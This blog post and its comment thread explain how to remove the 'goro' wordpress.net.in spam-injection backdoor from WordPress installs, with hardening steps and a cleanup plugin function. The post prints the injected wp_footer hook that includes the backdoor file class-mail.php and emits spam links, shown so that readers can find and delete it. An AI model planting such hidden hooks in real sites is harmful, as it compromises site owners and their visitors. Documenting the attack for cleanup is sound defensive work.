-
-
I found this while browsing WordPress support forum, some of these victims update their default_filters.php and upload class-mail.php inside their WordPress without being aware that it’s a backdoor (wordpress.net.in). There is no class-mail.php in WordPress except class-phpmailer.php. So don’t get confuse by it.Below is a quick workaround on how you can removed the offending goro spamware injection before Google banned you from the internet pipes.
Workaround
- For temporary disable remote include in php.ini settings.
;;;;;;;;;;;;;;;;;; ; Fopen wrappers ; ;;;;;;;;;;;;;;;;;; ; Whether to allow the treatment of URLs (like http:// or ftp://) as files. allow_url_fopen = off allow_url_include = off
- Check your .htaccess for suspicious redirect.
- Find class-mail.php inside “*/wp-includes/” directory and removed it.
- Find the following code inside “*/wp-includes/default_filters.php” and removed it
add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775'); function wpc7c16<>b8466d864eeefd20050625c7775() { @include('./wp-includes/class-mail.php'); if(sizeof($wparr)>0){ echo "!div id=\"goro\"!"; foreach($wparr as $k=>$v){ echo "“.ucwords($v[’key’]).”\n”; if($i++==$inum) break; } echo “!/div!”.$_footer; } } -
Robots.txt Exclusion
Optional - Prevent googlebot from indexing the static spam page.
Login to Wordpress Admin > Manage > Files > Other Files → Key in “Robots.txt”. Add the following code.User-agent: Googlebot Disallow: /*?* Disallow: /*?
Refer robots.txt.
Possible WordPress class (suspicious) files that would be tempered
Md5 checksum the following files, compare it with official versions from WordPress Release Archive.
The above methods only remove and disabled the spams links, there is no guarantee that it will protected you from future vulnerabilities. Backup (or export your post using WordPress eXtended RSS -WRX) and perform a full upgrade.
- Dec 13, 2007
-
I just notice this recently. You’ll need to check your site HTTP Header. Most of the hijacked websites doesn’t response with correct HTTP Status Header (400<>500). My guess is they did this to cloak from being crawl by search engine spiders. If you had cleaned all the infected files and your header doesn’t response correctly get a rookit scanner.
-
Check your website status header, try cloak your browser (UA) as Search Engine Crawler. The following screenshot will show you how to setup this at web-sniffer.net.
This methods may not work if the cloaking scripts used IP base tracking. So try on different user agent string (ie: inoktomi, askjeeves, ia_archiver).
Firefox Browser
You can also override your useragent string with firefox ↓.
about:config → general.useragent.overide = ‘ua strings‘
Wordpress.net.in Backdoor
Wordpress.net.in Doorway
Dec 24, 2007 → http://www.wordpress.net.in/mentors/alxumuk/
Backdoor Files
inside wp-includes directory.
- compat.php - (replace with latest version)
- class-mail.php delete
scan & removes all backdoor files and create a .htaccess file inside wp-includes & wp-content/plugins. Then add the following code to disabled directory listing (prevent informations leak & Directory search index).
Options -Indexes
Wordpress.net.in New Partner
Feb 23th 2008, We found a similar signature like wordpress.net.in at qwetro.com (germany). Probably from the same attacker with different agenda.
removes malicious create_function wp_head filters
This are fixes for wordpress.net.in spams header injection.
/** * Remove create_function action hook * append on wordpress wp_head filters * * @author Avice De'véreux <ck@kaizeku.com> * @copyright Copyright (c) 2006 Avice De'véreux * @version 1.0 * @license http://www.gnu.org/licenses/lgpl.html GNU Lesser General Public License * @link http://blog.kaizeku.com/wordpress/goro-spam-injection-wp-head-patch/ */ function remove_create_function_action() { global $wp_filter; $action_ref = 'wp_head'; $filter = $wp_filter[$action_ref]; $_lambda = array(); foreach(range(1,10) as $priority){ if (isset($filter[$priority])) { foreach($filter[$priority] as $registered_filter ){ $callback = (string) $registered_filter['function']; if ( preg_match("/lambda/", $callback) ) { $_lambda[$priority][] = $callback; } } } } if ( count($_lambda) >= 0 ){ foreach($_lambda as $priority => $callback) { if ( has_filter($action_ref,$callback) ){ remove_filter($action_ref, $callback, $priority, 1); } } } } add_action('init','remove_create_function_action');The plugin’s can be download at Kaizeku Ban, goro spam injection fixes
Related Posts
- Bluehost HostMonster CEO’s Blog hacked (wordpress.net.in)
- Matt Heaton Bluehost Hostmonster CEO’s Hacked Again - Strike II
External Links
- Websniffer View HTTP Request and Response Header
- Wordpress Support Forum
- National Vulnerability Database Wordpress 2.0 > 2.0.6
Short URL
- For temporary disable remote include in php.ini settings.
-
- November 30, 2007 at 9:06 am
- June 24, 2008 at 3:55 pm
- 0.3
- url
-
-
-
21 Responses to “How to remove wordpress.net.in spams”
Trackback URL: Use the TrackBack url ↑ to ping this article. If your blog does not support Trackbacks you might want to leave a comment instead. -
-
-
- permalink
-
Co-Founder of Mozilla Project WordPress Blog's Hacked...
Blake Ross, the Co-Founder of Mozilla Project WordPress Blog's Hacked by Wordpress.net.in Blackhat Spammer.
...... -
- 1 trackback(s) þ blog.kaizeku.com on WordPress 2.3.3
-
-
- permalink
-
[...] na enak problem, vendar o?itno jih je zelo malo rešilo vse skupaj. Ampak Google dela ?udeže: How to Removed Wordpress.net.in Spam Injection Infected by ‘Goro’ Spam class-mail.php Backdoor In rešitev je [...]
-
- 1 pingback(s) þ www.had.si on WordPress 2.1.3
-
-
- permalink
-
[...] I’ve find some useful information on how to clean that mess on Kakkoi: How to Removed Wordpress.net.in Spam Injection. [...]
-
- 1 pingback(s) þ www.mattiouz.com on WordPress 2.3.1
-
-
- permalink
-
[...] wordpress.net.in revealed a number of pages, including a blog entry by Avice De’vereux that described the symptoms and said they were caused by a spam injection hijack by [...]
-
- 1 pingback(s) þ gordon.dewis.ca on WordPress 2.3.2
-
-
- permalink
-
[...] is what Gordon Dewis discovered: Googling wordpress.net.in revealed a number of pages, including a blog entry by Avice De’vereux that described the symptoms and said they were caused by a spam injection hijack by [...]
-
- 1 pingback(s) þ jcheng.wordpress.com on WordPress MU
-
-
- permalink
-
[...] leads me to Avice’s perfectly wonderful life saving post, where she instructs how to remove [...]
-
- 1 pingback(s) þ www.domainersgazette.com on WordPress 2.1.2
-
-
- permalink
-
[...] en is alle gehackte code gevonden. Mocht je last hebben van de div id=”Goro” hack kijk dan eens hier voor handige tips voor het verwijderen. Alhoewel ik voorlopig geen PC klusjes zou doen gaan we toch [...]
-
- 1 pingback(s) þ www.desmeetsjes.nl on WordPress 2.0.3
-
-
- permalink
-
[...] Related: Blogs Take Center Stage For Marketers And For Google How to Remove Wordpress.net.in Spam Injection [...]
-
- 2 pingback(s) þ blog.cre8asite.net on WordPress 2.3.3
-
-
- permalink
-
[...] might go Here to learn the way to remove the Spam [...]
-
- 1 pingback(s) þ marketingeasy.net on WordPress 2.3.2
-
-
- permalink
-
[...] het te maken had met spam injection hijack by wordpress.net.in. Meer info over het probleem kan je hier vinden. De eenvoudigste oplossing voor het probleem, is een nieuwe versie van wordpress erop [...]
-
- 1 pingback(s) þ 2ourallies.org on WordPress 2.3
-
-
- permalink
-
[...] A great write up of how to clean this mess up can be found here. [...]
-
- 1 pingback(s) þ thesnarky.com on WordPress 2.0.5
-
-
- permalink
-
[...] problem was that a foreign div loads in the header “div id=goro“, and a list of spam links to various pron links. I asked my dear webbie to help me, and she [...]
-
- 1 pingback(s) þ robertogaloppini.net on WordPress 2.3.1
-
-
- permalink
-
[...] informations: gordon.dewis.ca Kakkoi via Windows Live Writer Group Share and Enjoy: These icons link to social bookmarking sites where [...]
-
- 1 pingback(s) þ www.live-writer.net on WordPress 2.5.1
-
-
- permalink
-
[...] Еще одна пошаговая инструкция к исправлению ситуации [...]
Google Translate (en-US) → http://cssing.org.ua/2008/06/01/wp-footer-exploit/ -
- 1 pingback(s) þ cssing.org.ua on WordPress 2.5
-
-
- permalink
-
[...] רשימת קישורים מועילים מומלץ לקרוא גם את התגובות בסוף כל מאמר. מתיו כץ: Three tips to protect your WordPress installation הקשחת וורדפרס, מהאתר הרשמי של וורדפרס: Hardening WordPress הגנה על וורדפרס בלוג מאת לורל: protecting-your-wordpress-blog נוספים:How Wordpress Blogs Are Hacked five wordpress security essentials Security Tips and Guidelines for your WordPress Blog How to Remove Wordpress.net.in Spam Injection [...]
-
- 2 pingback(s) þ itbananas.com on WordPress 2.5.1
-
-
- permalink
-
[...] Linux-by-Example Kakkoi Gordon Dewis [...]
-
- 1 pingback(s) þ www.startupaddict.com on WordPress 2.5.1
-
-
- permalink
-
[...] http://42.kaizeku.com/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-jagg... [...]
-
- 1 pingback(s) þ www.k-director.com on WordPress 2.6
-
-
-
"write as if you were talking to a good friend (in front of your mother)."
.haveyoursay
Disclaimer: For any content that you post, you hereby grant to Kakkoi the royalty-free, irrevocable, perpetual, exclusive and fully sublicensable license to use, reproduce, modify, adapt, publish, translate, create derivative works from, distribute, perform and display such content in whole or in part, world-wide and to incorporate it in other works, in any form, media or technology now known or later developed. Some rights reserved.
-
I got hacked to, mine was spam links to
donaldsensing.com:6666
I'm not sure who is "alxumuk" real name is, but there is an editor at DMOZ with similar display name.
Lack Resources
ATM I only have a few raw accesslog from Murray's blog & Jens's blog. Matt Heaton never replies.
I hope that Mr. Goro got careless and show his footprint, I need more raw access log. Send it to my email
Si fueran tan amables en ayudarme a limpiar file infectados los cuales son bastantaes , su programa es interesante aprenderlo pero no soy experta en esto.
Me podrian ayudar en esto se los agradeceria enormemente .
gracias
Sinceramente
Patricia
there is two version of goro spams.
if u stil cant remove the spams link try editing theme>header.php and theme>footer.php find and comment-out 'wp_head()' and 'wp_footer()' for temporary (this will also disabled any plugins and widget that depend on this hook)..